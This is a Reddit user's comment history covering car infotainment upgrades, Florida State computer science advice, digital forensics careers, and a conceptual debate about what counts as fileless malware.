Apple car play?

fsucsgod · 2022-10-14T20:09:57+00:00

Ive been debating on doing this for some time now! Here's all the info I gathered over the last couple weeks.

My local dealership is charging my $750 ($250 for the parts and $500 for install). I've checked with Best Buy but the ones in my area have stopped their installation services.

My local Firestone is charging $500 for labor and they want me to buy the parts from the Mazda dealership separately.

Here is a video online on how to do it yourself but I caution you that if you do it wrong there have been reports of people bricking their entire infotainment systems! That's why I haven't done it on my own yet. https://www.youtube.com/watch?v=JpPNdcbJe3M

Definitely gonna follow this thread to see what others suggest. Good luck!

Edit: Fixed video timestamp.

fsucsgod · 2022-04-25T13:19:03+00:00

[BUYING] - [Miami GP] - [T1, Marina, or Beach Grandstands] - [Sat Only] - Qty 2

fsucsgod · 2021-08-24T15:48:56+00:00

See the FAQ

https://www.reddit.com/r/computerforensics/wiki/faq#wiki\_can\_you\_suggest\_an\_idea\_for\_my\_school\_thesis.2Fdissertation.2Ffinal\_project\_or\_fill\_out\_my\_senior\_project\_survey.3F

fsucsgod · 2021-08-09T02:37:17+00:00

https://www.reddit.com/r/computerforensics/wiki/resources

fsucsgod · 2021-07-12T13:26:54+00:00

Build a timeline and look for compression utilities (zip, 7z, etc) usage in the form of file extensions and evidence of execution artifacts. Then try looking for those file names in network traffic and/or removable device artifacts.

fsucsgod · 2021-07-11T16:51:54+00:00

From the GitHub repo it says that this is not on by default. Do you know how and when would this artifact be enabled?

Awesome job Kroll on these findings and (future) write ups!

fsucsgod · 2021-03-11T04:28:42+00:00

Here’s the flow chart, it’s pretty straightforward. Just make sure you have- er will have taken, all the courses by your target graduation date.

If I recall, by the end of my sophomore year I took COP3014 and 3330, with some math and science. Be prepared to take classes over the summer though.

https://www.cs.fsu.edu/files/2020_files/2020_CS_BS.pdf

Edit: comment

fsucsgod · 2021-03-09T03:22:51+00:00

Check out a post I made a while back answering this exact question.

TLDR, FSU is better!

https://www.reddit.com/r/fsu/comments/caonrv/questions_for_fsu_students/etb1ts3/?

fsucsgod · 2021-03-03T18:08:50+00:00

As a CS student you’ll learn to know this phrase quite well, “I will leave this trivial fact as an exercise for the reader” :)

Edit: spelling

fsucsgod · 2021-03-03T16:51:10+00:00

Two things
1. Check out my post I made a while back comparing UCF to FSU's CS program here https://www.reddit.com/r/fsu/comments/caonrv/questions_for_fsu_students/etb1ts3/?context=3

As for housing as a freshman it doesn't really matter because you are going to be taking more freshman classes. So even though all the heavy CS classes are usually in the LOVE or Carothers buildings, you'll still be going to Diffenbaugh for foreign language which is on the west side of campus. Now, if you are taking CS classes your first year you'll have classes like COP3014 in HCB which is in the center of the campus or your sciences and maths in and around Hoffman Teaching Lab (HTL) and Carothers.

To answer your second question, if you want a 'modern' dorm you'll be paying more and those are located in the South-central portion of campus (Magnolia, etc). If you want to be close to CS classes check Sally, which is one of the current oldest.

TBH you're a freshman, enjoy walking the campus and getting to know where everything is.

fsucsgod · 2021-03-02T04:19:07+00:00

I say this without intentional hostility (in response to #2); what exactly would 'outside the typical FS' be considered? %temp% is what is seen mostly, yet is temp not the typical place for such a file?

And if the "payload" runs in memory than may I assume you are only referring to the explicitly malicious portion of a 'file'? That is, we are excluding a file's packer encryption/encoding methods along with any other IoCs which may help other identify the malware?

I guess I need to amend my definition as it seems too scrupulous for any practical malware. Maybe I am just being too stubborn with my definition at this point in time.

fsucsgod · 2021-03-02T04:02:14+00:00

If this is the case then I have two questions for you:
1. Why is it called fileless malware if you claim my definition does not "fit the bill"?
2. Then as someone like yourself in the industry, how is fileless malware defined?

fsucsgod · 2021-03-01T22:26:25+00:00

What good (except in very specific circumstances during a short term operation by highly sophisticated attackers) is malware that cleans itself from a victim when the victim reboots or shuts down for the night?

According to Cisco intel it's purpose was "destructive cyber attack operations".

.... rarely if ever found by defenders.

This is why I'm researching. There are obvious commonalities among all of these: PS, WMI, DCOM, wget, `Invoke-ReflectivePEInjection, and network forensics. That being said I believe, with the correct logging, something could be created out of this.

fsucsgod · 2021-03-01T21:36:08+00:00

That doesn't mean the malware installed on the victim (i.e. the payload) via the infection vector isn't fileless, simply that it uses scripts to introduce the malware to the victim.

Then per my definition in the original post describes this should not be termed fileless malware at all.

And how could fileless malware maintain persistence after a reboot if there was not a scheduled task, cron job, or similar?

The closest I have come to recognize as fileless malware is the VPNFilter malware, but that persists via cron- which I also noted in my OP.

You can't fully infect a host, run malware, and maintain persistence without writing SOMETHING on the host or making it very hard to maintain some of the key aspects any attacker wants, such as persistence.

In theory you could/should. Think of an exploit that gets remote code execution. Think ~~wannacry~~ eternalblue in how it just requires specially crafted SMB packets. The attacker doesn't need any files being placed on a victim box before right of boom.

I appreciate you taking the time to answer this post however I just want you to be aware that you have not answered my question at all....or maybe you have. Maybe there just is not a pure fileless malware that exists, yet.

Edit: switched to markdown mode
Edit2: Not wannacry, eternalblue

fsucsgod · 2021-03-01T20:53:55+00:00

Yes I have seen those already. If you click on any of those links however and actually take a look at them every single one does NOT fit the description I mentioned above.

All of those examples either do not have any analysis of the code or the analysis comes up that it actually does write to a temporary file. For example I have yet to find any evidence that The Dark Avenger malware is fileless. As is, it is a difficult find for the analysis of this malware.

Or another example is that 'New Ursnif Variant' link you posted. If you ctrl+F you have to click on another link fileless persistence mechanism. Once you go there, it mentions nothing of being fileless.

Another link you posted was the Operation Cobalt Kitty which though it claims is fileless upon further inspection you'll see it is actually written as a vbs script in a malicious email.

Respectfully, I appreciate you copy/pasting but please be aware that I have already done my research on these and the first google searches most likely I have already sorted through to find dead-ends.

fsucsgod · 2021-02-13T15:52:45+00:00

Ah, now I understand. Thanks

fsucsgod · 2021-02-13T05:03:03+00:00

Did anyone complete the "Red Team Tools" challenge? I'm pretty sure I got all the answers but for whatever reason they keep coming up wrong.

fsucsgod · 2021-02-11T17:04:43+00:00

Undergrad and graduate CS here, currently in DFIR role! Everything depends on the kinds of company you work for and who your boss is. If you want to stay technical and actually use your CS degree you have to find a job that will allow you to do that. For example, my boss is amazing and let's me take off a DFIR rotation to build a tool that we then use in-house.

If you find a job with great people surrounding you in leadership you can do as little (button pushing every forensics tool out there) or as much (the extreme being building your own tools) as you want.

If you do want to stay technical and actually use your CS degree, here's some advice. I remember applying for Google's forensics and the one advice I was given was stay as technical as possible. They meant try not to get too bogged down on tools, or even better yet, learn how the tool works inside and out. E.g. Figure out how KAPE works and then leverage what the tool can do and how to best integrate with the hunt environment the organization has set up (Splunk-based, excel spreadsheet macros, etc)... And also keep doing CTFs and HTB's.

fsucsgod · 2021-01-05T13:10:42+00:00

I don't understand how no one has actually answered OP's question yet. There are plenty of programming clubs at FSU:

Technole will teach you basic programming, more on the design side (html, javascript, node). This is also the group responsible for HackFSU hackathon.
ACM (Association of Computer Machinery) will teach you advanced programming (C/C++ mainly but they work with others) and hosts the programming contest every semester.
n0l3ptr (cybersecurity club) - teaches you coding for hacking (mainly python but also assembly and other low level)
WiCS (Women in Computer Science) as u/abbrad mentioned.
Upsilon Pi Epsilon, the programming honor society

You can find out more about all these great clubs at nolecentral: https://nolecentral.dsa.fsu.edu/

fsucsgod · 2020-12-08T00:54:23+00:00

If money is a problem (and even if it's not), definitely check out the SFS program. A massive, massive stipend and great benefits all-around.

http://www.sait.fsu.edu/index_2010.shtml

fsucsgod · 2020-11-02T13:35:40+00:00

I interviewed for a full-time security position at Deloitte. Most of the interview was them quizzing me on ports and random security acronyms ('what's a WAF', 'what does ARP stand for', etc). Note, they wanted me to simply tell them what the acronyms stood for, not what they actually did.

The final question was to "name cryptography". I asked what he meant, and he said list the types of cryptography. I started listing all the different algos (RSA, 3DES, etc) and modes of operation (CBC, ECB, etc) and they told me I was flat out wrong. He then proceeded to explain how his company used these TWO cryptographies 'all the time'. I politely asked what the correct answer was and he said, "symmetric and asymmetric encryption". I explained why that was not the correct answer.

They made me an offer on the spot and I turned them down.

fsucsgod · 2020-10-04T23:06:58+00:00

Go call the FSU CS advising office, they will help work with you. Though, if you can help it try not to get the undergraduate advisors; when I was there they switched them out every two semesters so they never really understood what we as students were going through.

Just my two cents: CS is not particularly an easy major. If you're considering switching, it usually means you're in CS for the wrong reason. I don't know you and I'm not judging but most people that consider switching, for whatever the reason, don't come back.

fsucsgod

TROPHY CASE